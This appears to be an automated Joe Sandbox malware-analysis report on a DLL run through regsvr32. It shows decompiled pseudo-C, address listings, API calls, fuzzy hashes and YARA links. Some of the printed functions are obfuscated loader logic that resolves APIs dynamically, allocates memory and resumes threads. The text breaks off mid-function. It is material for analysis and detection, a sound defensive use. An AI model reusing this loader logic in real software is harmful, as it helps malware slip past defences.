            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: LibraryLoad$ErrorLast
            • String ID:
            • API String ID: 3177248105-0
            • Opcode ID: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction ID: 86a01d814bd3c7a38d2acc67e006ba4d0be947cb9d37a03154583fbf8b7eb709
            • Opcode Fuzzy Hash: b3305a36941746b9fbdf43aaec4aa69123dbd6b33dc5709246f5686035d6fb43
            • Instruction Fuzzy Hash: 1101A736656223AFCF26DA788C45B6677B8AF477617164E21F926D7A40D720D800C6F0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50C854 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
            Download Yara Rule
            C-Code - Quality: 72%
            			E6D50C854(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6d55ce4c; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6D50B523(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6D50CC4A(_t25, _t36, __eflags,  *0x6d55ce4c, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D50C69A(_t25, _t31, 0x6d55dfbc);
							E6D50B3FE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6D50B3FE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6D50B4E0(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6d55ce4c; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6D50B523(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6D50CC4A(_t27, _t37, __eflags,  *0x6d55ce4c, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6D50C69A(_t27, _t32, 0x6d55dfbc);
									E6D50B3FE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6D50B3FE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6D50CBF4(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6D50CBF4(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















            0x6d50c854
            0x6d50c854
            0x6d50c854
            0x6d50c85e
            0x6d50c860
            0x6d50c865
            0x6d50c868
            0x6d50c876
            0x6d50c87d
            0x6d50c882
            0x6d50c885
            0x6d50c888
            0x6d50c89a
            0x6d50c89f
            0x6d50c8a1
            0x6d50c8ac
            0x6d50c8b3
            0x6d50c8b8
            0x6d50c8bb
            0x6d50c8bd
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d50c8a3
            0x6d50c8a3
            0x00000000
            0x6d50c8a3
            0x6d50c88a
            0x6d50c88a
            0x6d50c88b
            0x6d50c88b
            0x6d50c890
            0x6d50c8cb
            0x6d50c8cc
            0x6d50c8d2
            0x6d50c8d7
            0x6d50c8da
            0x6d50c8db
            0x6d50c8dc
            0x6d50c8e3
            0x6d50c8e5
            0x6d50c8e7
            0x6d50c8ec
            0x6d50c8ef
            0x6d50c8fd
            0x6d50c909
            0x6d50c90c
            0x6d50c90f
            0x6d50c921
            0x6d50c926
            0x6d50c928
            0x6d50c933
            0x6d50c939
            0x6d50c941
            0x6d50c943
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d50c92a
            0x6d50c92a
            0x00000000
            0x6d50c92a
            0x6d50c911
            0x6d50c911
            0x6d50c912
            0x6d50c912
            0x6d50c945
            0x6d50c946
            0x6d50c946
            0x6d50c8f1
            0x6d50c8f7
            0x6d50c8fb
            0x6d50c94e
            0x6d50c94f
            0x6d50c955
            0x00000000
            0x00000000
            0x00000000
            0x6d50c8fb
            0x6d50c95c
            0x6d50c95c
            0x6d50c86a
            0x6d50c870
            0x6d50c874
            0x6d50c8bf
            0x6d50c8c0
            0x6d50c8ca
            0x00000000
            0x00000000
            0x00000000
            0x6d50c874

            APIs
            • GetLastError.KERNEL32(?,7FFFFFFF,6D50B5BE,7FFFFFFF,?,?,6D50F735,00000000,-00000002,00000000,00000000,?), ref: 6D50C858
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8C0
            • SetLastError.KERNEL32(00000000,-00000002,00000000,00000000,?), ref: 6D50C8CC
            • _abort.LIBCMT ref: 6D50C8D2
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: e98e8c03235287e5bf68fa41884d4c2e6d30ad6b09140a37f094b02224e8a1de
            • Instruction ID: 43e23305d1d31deae87f778f7f32cb5f55ae3ed74ba9a86c315b4dcaaab53626
            • Opcode Fuzzy Hash: e98e8c03235287e5bf68fa41884d4c2e6d30ad6b09140a37f094b02224e8a1de
            • Instruction Fuzzy Hash: 89F0A436548A0227DB1F63389C46B7A2739AFC3765F274934FA38A6E90FF60C8014138
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D509556 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E6D509556() {
				void* _t4;
				void* _t8;

				E6D509BB7();
				E6D509B4B();
				if(E6D509871() != 0) {
					_t4 = E6D509823(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E6D5098AD();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





            0x6d509556
            0x6d50955b
            0x6d509567
            0x6d50956c
            0x6d509571
            0x6d509573
            0x6d50957e
            0x6d509575
            0x6d509575
            0x00000000
            0x6d509575
            0x6d509569
            0x6d509569
            0x6d50956b
            0x6d50956b

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 6D509556
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 6D50955B
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 6D509560
              • Part of subcall function 6D509871: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 6D509882
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 6D509575
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction ID: d90614ca0d015046cab73c324254a7e9ee5ac060ac4e7626a7eca5fafead8629
            • Opcode Fuzzy Hash: 01f7b16c400fcf307e9578c73aa797bece4769187de86bf5317350189038e6d2
            • Instruction Fuzzy Hash: 9BC04C5814C252501C4C6AB2726019D93141FE2A9CF8F58C1CBC157F4D8F06880A2C73
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D518F63 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 365COMMON
            Download Yara Rule
            C-Code - Quality: 41%
            			E6D518F63() {
				signed int _t307;
				intOrPtr _t323;
				signed int _t333;
				intOrPtr _t337;
				signed int _t376;
				intOrPtr _t399;
				signed int _t421;
				intOrPtr* _t425;
				void* _t426;
				void* _t427;

				_t337 =  *0x6d540000; // 0x2c369a8
				 *_t425 = _t337;
				 *((intOrPtr*)(_t337 + 0x1d8)) =  *((intOrPtr*)(_t425 + 0x4c));
				 *((intOrPtr*)(_t425 + 0x14)) = 0x2872;
				 *((intOrPtr*)(_t425 + 0xc)) = 0x29d1;
				 *((intOrPtr*)(_t425 + 0x20)) = 0x1df3;
				 *((intOrPtr*)(_t425 + 0x28)) = 0;
				 *((intOrPtr*)(_t425 + 0x10)) = 0x1e7b;
				 *((intOrPtr*)(_t425 + 0x18)) = 0x1eee;
				 *((intOrPtr*)(_t425 + 0x50)) = 0x260d;
				 *((intOrPtr*)(_t425 + 0x24)) = 0x24ad;
				 *((intOrPtr*)(_t425 + 0x2c)) = 0x29d1;
				 *((intOrPtr*)(_t425 + 0x1c)) = 0x29b2;
				 *((intOrPtr*)(_t425 + 0xc)) = 0;
				 *((intOrPtr*)(_t425 + 0x3c)) =  *((intOrPtr*)(_t425 + 0x14)) + 0x9f7;
				 *((intOrPtr*)(_t425 + 0x18)) =  *((intOrPtr*)(_t425 + 0x5c)) - 0x71f;
				_push( *((intOrPtr*)(_t425 + 0x24)) + 0x2fb);
				_push( *((intOrPtr*)(_t425 + 0x34)) + 0x2749);
				_push( *((intOrPtr*)(_t425 + 0x20)) - 0x984);
				_push( *((intOrPtr*)(_t425 + 0x30)) + 0x7e3);
				_push( *((intOrPtr*)(_t425 + 0x14)) + 0x1df3);
				_push( *((intOrPtr*)(_t425 + 0x28)) - 0x140);
				_push( *((intOrPtr*)(_t425 + 0x28)));
				_push( *((intOrPtr*)(_t425 + 0x1c)) + 0xe15);
				_push( *((intOrPtr*)(_t425 + 0x38)));
				_push( *((intOrPtr*)(_t425 + 0x60)));
				 *((intOrPtr*)(_t425 + 0x40)) = E6D506FC7();
				 *((intOrPtr*)(_t425 + 0x54)) =  *((intOrPtr*)(_t425 + 0x54)) + 0x10b2;
				 *((intOrPtr*)(_t425 + 0x40)) =  *((intOrPtr*)(_t425 + 0x40)) + 0x606;
				 *((intOrPtr*)(_t425 + 0x64)) =  *((intOrPtr*)(_t425 + 0x44)) + 0xb56;
				_push( *((intOrPtr*)(_t425 + 0x58)) - 0x6ba);
				_push( *((intOrPtr*)(_t425 + 0x50)) - 0xb37);
				_push( *((intOrPtr*)(_t425 + 0x48)) - 0x9f7);
				_push( *((intOrPtr*)(_t425 + 0x4c)) - 0x73);
				_t399 =  *((intOrPtr*)(_t425 + 0x48));
				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2597);
				_push(_t399);
				_push( *((intOrPtr*)(_t425 + 0x5c)) + 0x2872);
				_push( *((intOrPtr*)(_t425 + 0x58)) + 0x524);
				_push( *((intOrPtr*)(_t425 + 0x84)));
				 *((intOrPtr*)(_t425 + 0x70)) = E6D50768E();
				_t426 = _t425 + 0x4c;
				 *((intOrPtr*)(_t399 + 0x8c)) =  *((intOrPtr*)(_t399 + 0x1f4));
				 *((intOrPtr*)(_t426 + 0x20)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x140;
				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x14)) + 0x28a4;
				_push( *((intOrPtr*)(_t426 + 0x10)));
				 *((intOrPtr*)(_t426 + 0x54)) =  *((intOrPtr*)(_t426 + 0x20)) + 0x101;
				 *((intOrPtr*)(_t426 + 0x50)) =  *((intOrPtr*)(_t426 + 0x18)) + 0x2ea5;
				 *((intOrPtr*)(_t426 + 0x4c)) =  *((intOrPtr*)(_t426 + 0x2c)) + 0x111;
				 *((intOrPtr*)(_t426 + 0x48)) =  *((intOrPtr*)(_t426 + 0x20)) + 0xb37;
				 *((intOrPtr*)(_t426 + 0x44)) =  *((intOrPtr*)(_t426 + 0x28)) + 0x8ce;
				 *((intOrPtr*)(_t426 + 0x40)) =  *((intOrPtr*)(_t426 + 0x60)) + 0x898;
				_push( *((intOrPtr*)(_t426 + 0x18)) + 0x1e7b);
				_push( *((intOrPtr*)(_t426 + 0x30)) - 0x10b2);
				_push( *((intOrPtr*)(_t426 + 0x28)) + 0x102a);
				_push( *((intOrPtr*)(_t426 + 0x34)) - 0x632);
				_push( *((intOrPtr*)(_t426 + 0x38)) + 0x1df3);
				_push( *((intOrPtr*)(_t426 + 0x24)));
				_push( *((intOrPtr*)(_t426 + 0x3c)));
				_push( *((intOrPtr*)(_t426 + 0x5c)));
				_push( *((intOrPtr*)(_t426 + 0x64)));
				_push( *((intOrPtr*)(_t426 + 0x6c)));
				_push( *((intOrPtr*)(_t426 + 0x74)));
				_push( *((intOrPtr*)(_t426 + 0x7c)));
				_push( *((intOrPtr*)(_t426 + 0x84)));
				_push( *((intOrPtr*)(_t426 + 0x8c)));
				 *((intOrPtr*)(_t426 + 0x98)) = E6D502AE5();
				 *((intOrPtr*)(_t426 + 0x7c)) =  *((intOrPtr*)(_t426 + 0x64)) + 0x4f3;
				 *((intOrPtr*)(_t426 + 0x80)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xbc5;
				 *((intOrPtr*)(_t426 + 0x84)) =  *((intOrPtr*)(_t426 + 0x54)) - 0xcc0;
				 *((intOrPtr*)(_t426 + 0x88)) =  *((intOrPtr*)(_t426 + 0x64)) - 0x505;
				 *((intOrPtr*)(_t426 + 0x8c)) =  *((intOrPtr*)(_t426 + 0x70)) + 0x2b78;
				_push( *((intOrPtr*)(_t426 + 0x4c)));
				_push( *((intOrPtr*)(_t426 + 0x70)) - 0x632);
				_push( *((intOrPtr*)(_t426 + 0x68)) + 0x4f3);
				_push( *((intOrPtr*)(_t426 + 0x68)) - 0x505);
				_push( *((intOrPtr*)(_t426 + 0x98)) - 0xab1);
				_push( *((intOrPtr*)(_t426 + 0x98)) - 0x6bb);
				_push( *((intOrPtr*)(_t426 + 0x70)) + 0x1df3);
				_push( *((intOrPtr*)(_t426 + 0x5c)) - 0xb37);
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				_push( *((intOrPtr*)(_t426 + 0xac)));
				 *((intOrPtr*)(_t426 + 0x98)) = E6D50391B();
				_t427 = _t426 + 0x70;
				if( *(_t427 + 0x14) >=  *(_t427 + 0x1c) + 0x9f7) {
					L3:
					_t376 =  *(_t427 + 0x10);
					L4:
					return  *((intOrPtr*)(_t376 + 0x15c));
				}
				if( *(_t427 + 0x14) >=  *(_t427 + 0x18) + 0xfffffa7b) {
					_t333 =  *(_t427 + 0x20);
					 *(_t427 + 0x38) = _t333;
					if(_t333 ==  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c)) {
						goto L3;
					}
					_t376 =  *(_t427 + 0x10);
					do {
						if( *(_t427 + 0x20) < ( *(_t427 + 0x1c) & 0x00002c90)) {
							 *((intOrPtr*)(_t427 + 0x3c)) =  *((intOrPtr*)(_t376 + 0x104)) -  *((intOrPtr*)(_t427 + 0x24));
							 *(_t427 + 0x40) = ( *(_t376 + 0x1d4) | 0x00002872) ^ 0x000024ad;
							 *(_t427 + 0x44) =  *(_t427 + 0x5c) *  *(_t376 + 0xe8);
							 *(_t427 + 0x48) =  *(_t376 + 0x74) & 0x00002749;
							 *(_t427 + 0x50) =  *(_t427 + 0x14) +  *(_t427 + 0x5c);
							 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x14) -  *((intOrPtr*)(_t376 + 0x90)) -  *(_t427 + 0x30);
							 *((intOrPtr*)(_t427 + 0x54)) =  *(_t427 + 0x14) + ( *(_t427 + 0x14) ^  *(_t427 + 0x5c));
							_t421 =  *(_t427 + 0x10);
							_push( *( *(_t427 + 0x10) + 0x13c) &  *(_t421 + 0x1d4));
							_push(( *(_t427 + 0x1c) ^ 0x00000a68) & 0x00001eee);
							_push( *(_t427 + 0x18) * 0x2749);
							_push(( *(_t376 + 0x17c) &  *(_t376 + 0xd8)) - 0x1eee);
							_push(_t421);
							_push( *(_t427 + 0x18) +  *((intOrPtr*)(_t427 + 0x24)) +  *(_t376 + 0xd4));
							_push(( *(_t376 + 8) | 0x000029d1) * 0x2597);
							_push( *((intOrPtr*)(_t427 + 0x68)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_push( *((intOrPtr*)(_t427 + 0x70)));
							_t307 = E6D515588();
							_t376 =  *(_t427 + 0x48);
							_t427 = _t427 + 0x38;
							_t333 =  *(_t427 + 0x38);
							 *(_t427 + 0x34) = _t307;
						}
						_t333 = _t333 + 3;
						 *(_t427 + 0x5c) =  *(_t427 + 0x5c) + ( *(_t427 + 0x5c) &  *(_t376 + 0xd4)) -  *((intOrPtr*)(_t376 + 0x90));
						 *(_t427 + 0x38) = _t333;
						 *(_t427 + 0x2c) =  *(_t427 + 0x2c) ^ ( *(_t376 + 0x148) & 0x000028a4) + 0x00002ac3;
						 *(_t427 + 0x30) =  *(_t427 + 0x30) ^  *(_t427 + 0x1c) +  *(_t427 + 0x20) *  *(_t376 + 0x1d4);
						 *(_t376 + 0x1d4) =  *(_t376 + 0x1d4) + ( *(_t376 + 0x158) & 0x000029d1);
						 *(_t376 + 0x80) =  *(_t376 + 0x80) ^  *(_t427 + 0x14) * ( *(_t427 + 0x5c) -  *(_t427 + 0x30));
						 *(_t376 + 0x80) =  *(_t376 + 0x80) -  *(_t427 + 0x34) * ( *(_t376 + 0x1c) ^  *(_t376 + 0x130));
					} while (_t333 !=  *((intOrPtr*)(_t427 + 0x24)) -  *(_t427 + 0x1c));
					goto L4;
				}
				 *((intOrPtr*)(_t427 + 0x3c)) =  *(_t427 + 0x2c) - 0xcbc;
				 *(_t427 + 0x40) =  *(_t427 + 0x18) - 0x606;
				 *(_t427 + 0x44) =  *(_t427 + 0x18) - 0xc38;
				 *(_t427 + 0x48) =  *(_t427 + 0x14) + 0x2ab3;
				 *((intOrPtr*)(_t427 + 0x4c)) =  *(_t427 + 0x34) + 0x2c90;
				 *(_t427 + 0x50) =  *(_t427 + 0x1c);
				 *((intOrPtr*)(_t427 + 0x54)) =  *((intOrPtr*)(_t427 + 0x28)) - 0x2c4;
				_push( *(_t427 + 0x2c) - 0x102a);
				_push( *(_t427 + 0x2c) - 0x977);
				_push( *(_t427 + 0x5c) - 0x32);
				_push( *(_t427 + 0x38) - 0x7e8);
				_push( *(_t427 + 0x2c) - 0x3f2);
				_push( *(_t427 + 0x18) - 0xcc0);
				_push( *(_t427 + 0x5c) + 0x12d);
				_push( *(_t427 + 0x2c));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_push( *((intOrPtr*)(_t427 + 0x74)));
				_t323 = E6D5173B5();
				_t427 = _t427 + 0x3c;
				 *((intOrPtr*)(_t427 + 0x24)) = _t323;
				goto L3;
			}













            0x6d518f66
            0x6d518f70
            0x6d518f74
            0x6d518f7f
            0x6d518f8c
            0x6d518f90
            0x6d518f94
            0x6d518f9c
            0x6d518fa4
            0x6d518fac
            0x6d518fb4
            0x6d518fbc
            0x6d518fc0
            0x6d518fc9
            0x6d518fdc
            0x6d51901b
            0x6d51902e
            0x6d51902f
            0x6d519030
            0x6d519031
            0x6d519032
            0x6d519033
            0x6d519034
            0x6d519038
            0x6d519039
            0x6d51903d
            0x6d519046
            0x6d51904a
            0x6d519052
            0x6d519096
            0x6d5190a9
            0x6d5190aa
            0x6d5190ab
            0x6d5190ac
            0x6d5190ad
            0x6d5190b1
            0x6d5190b2
            0x6d5190b3
            0x6d5190b4
            0x6d5190b5
            0x6d5190c1
            0x6d5190c5
            0x6d5190ce
            0x6d5190d4
            0x6d5190e5
            0x6d5190ed
            0x6d5190f6
            0x6d519103
            0x6d519110
            0x6d51911d
            0x6d51912a
            0x6d519161
            0x6d519174
            0x6d519175
            0x6d519176
            0x6d519177
            0x6d519178
            0x6d519179
            0x6d51917a
            0x6d51917b
            0x6d51917f
            0x6d519183
            0x6d519187
            0x6d51918b
            0x6d51918f
            0x6d519196
            0x6d5191a2
            0x6d5191b7
            0x6d5191c4
            0x6d5191d4
            0x6d5191e1
            0x6d519219
            0x6d519226
            0x6d519243
            0x6d519244
            0x6d519245
            0x6d519246
            0x6d519247
            0x6d519248
            0x6d519249
            0x6d51924a
            0x6d519251
            0x6d519258
            0x6d51925f
            0x6d519266
            0x6d519272
            0x6d519279
            0x6d519289
            0x6d51936d
            0x6d51936d
            0x6d519371
            0x6d51937e
            0x6d51937e
            0x6d51929c
            0x6d51937f
            0x6d51938b
            0x6d519391
            0x00000000
            0x00000000
            0x6d519393
            0x6d519397
            0x6d5193a4
            0x6d5193c1
            0x6d5193ca
            0x6d5193e3
            0x6d5193ef
            0x6d519401
            0x6d519405
            0x6d519421
            0x6d519425
            0x6d519476
            0x6d519477
            0x6d519478
            0x6d519479
            0x6d51947a
            0x6d51947f
            0x6d519480
            0x6d519481
            0x6d519482
            0x6d519486
            0x6d51948a
            0x6d51948e
            0x6d519492
            0x6d519496
            0x6d51949a
            0x6d51949f
            0x6d5194a3
            0x6d5194a6
            0x6d5194aa
            0x6d5194aa
            0x6d5194b2
            0x6d5194c1
            0x6d5194d0
            0x6d5194d9
            0x6d5194ee
            0x6d5194fd
            0x6d519518
            0x6d51952a
            0x6d519538
            0x00000000
            0x6d519540
            0x6d5192ab
            0x6d5192b8
            0x6d5192c5
            0x6d5192d2
            0x6d5192df
            0x6d5192e7
            0x6d519327
            0x6d51933a
            0x6d51933b
            0x6d51933c
            0x6d51933d
            0x6d51933e
            0x6d51933f
            0x6d519340
            0x6d519341
            0x6d519345
            0x6d519349
            0x6d51934d
            0x6d519351
            0x6d519355
            0x6d519359
            0x6d51935d
            0x6d519361
            0x6d519366
            0x6d519369
            0x00000000

            APIs
              • Part of subcall function 6D50768E: SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
              • Part of subcall function 6D50768E: Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D5039B2
              • Part of subcall function 6D50391B: GetProcAddress.KERNEL32(?,?), ref: 6D503C34
              • Part of subcall function 6D50391B: VirtualAlloc.KERNEL32(00000000,?,?,00000004), ref: 6D503C97
            • SNifCw242OCD._RSR(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D51949A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AddressCw242Proc$AllocMqae01idVirtual
            • String ID: &$r(
            • API String ID: 1422986367-2886967036
            • Opcode ID: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction ID: 789f9c777a2ec3f8db38928147d4ba24ffb983072f7d79f474136505c6188d1c
            • Opcode Fuzzy Hash: 827b6f0de347a1d9e78845b0b84c984fda7312979fd4f52ef06c6568f675e1b8
            • Instruction Fuzzy Hash: F5F1EC726083419FE354CF68C984A5BFBE4FB88348F048A2DF5989B391D778E954CB52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D51A07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144threadCOMMON
            Download Yara Rule
            C-Code - Quality: 19%
            			E6D51A07D() {
				intOrPtr _t61;
				void* _t100;
				signed int _t122;
				intOrPtr _t123;
				signed int _t124;
				void* _t127;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				signed int _t134;
				intOrPtr _t137;
				intOrPtr _t140;
				intOrPtr _t142;
				intOrPtr _t143;
				void* _t145;
				void* _t147;

				_t61 =  *((intOrPtr*)(_t147 + 0x48));
				_t124 = _t61 - 0x252e;
				_t130 =  *((intOrPtr*)(_t147 + 0x20)) + 0x2c4;
				 *(_t147 + 0x50) = _t124;
				_t122 = _t61 + 0x484;
				_t140 =  *((intOrPtr*)(_t147 + 0x48)) + 0xffffe185;
				 *((intOrPtr*)(_t147 + 0x14)) = _t130;
				_t134 =  *((intOrPtr*)(_t147 + 0x44)) + 0xfffffc3c;
				 *((intOrPtr*)(_t147 + 0x10)) = _t140;
				_t145 =  *((intOrPtr*)(_t147 + 0x24)) + 0x56b;
				 *(_t147 + 0x30) = _t134;
				if(_t124 != _t130 + 0x616) {
					if(_t140 > _t122 + 0x2de) {
						_t142 =  *((intOrPtr*)(_t147 + 0x28));
						if( *((intOrPtr*)(_t142 + 0x74)) <= ( *(_t142 + 0x168) ^  *(_t142 + 0x104) | _t122)) {
							__imp__ActivateActCtx( *((intOrPtr*)(_t142 + 0x80)) + _t124,  *(_t142 + 0x48) &  *(_t142 + 0x130) & 0x0000ffff, _t124 & 0x00002ab3, ( *(_t142 + 0x130) -  *((intOrPtr*)(_t142 + 0xbc))) * 0x2ac3, _t145 - _t130);
							_push(( *(_t142 + 0x4c) & _t122) + 0x2ac3);
							_push(( *(_t142 + 0xd8) ^  *(_t142 + 0x5c)) -  *((intOrPtr*)(_t147 + 0x44)) + 0x6b3);
							_push(_t134 ^ 0x0000252e);
							ResumeThread( *(_t142 + 0x110) ^ 0x00001e7b);
						}
					} else {
						_t143 =  *((intOrPtr*)(_t147 + 0x54));
						_t137 =  *((intOrPtr*)(_t147 + 0x28));
						_push(_t122 + 0x101);
						_push(_t124 + 0x29d1);
						_push( *((intOrPtr*)(_t147 + 0x58)) + 0x88);
						_push(_t137);
						_t19 = _t143 + 0x71f; // 0x6d50205b
						_push( *((intOrPtr*)(_t147 + 0x24)) + 0x2749);
						_push( *((intOrPtr*)(_t147 + 0x54)) + 0xfffffd25);
						_push( *((intOrPtr*)(_t147 + 0x4c)) + 0x13c);
						_t23 = _t143 + 0xfb7; // 0x6d5028f3
						_push( *((intOrPtr*)(_t147 + 0x40)) + 0x345);
						_t100 = E6D501986();
						_t131 =  *((intOrPtr*)(_t147 + 0x38));
						_t127 = _t100;
						_push(_t145 - 0xc5);
						_push(_t131 + 0x21e9);
						_t29 = _t147 + 0x80; // 0x6d50205b
						_t123 =  *_t29;
						_push(_t122 - 0xbbf);
						_push(_t123 + 0x73b);
						_push(_t123 + 0x956);
						_push(_t137);
						_push(_t131 + 0x252e);
						_t33 = _t127 - 0x606; // -1542
						_push( *((intOrPtr*)(_t147 + 0x5c)) + 0xfffff9ce);
						_push(_t123 + 0x7a4);
						_t36 = _t127 + 0x1dd; // 0x1dd
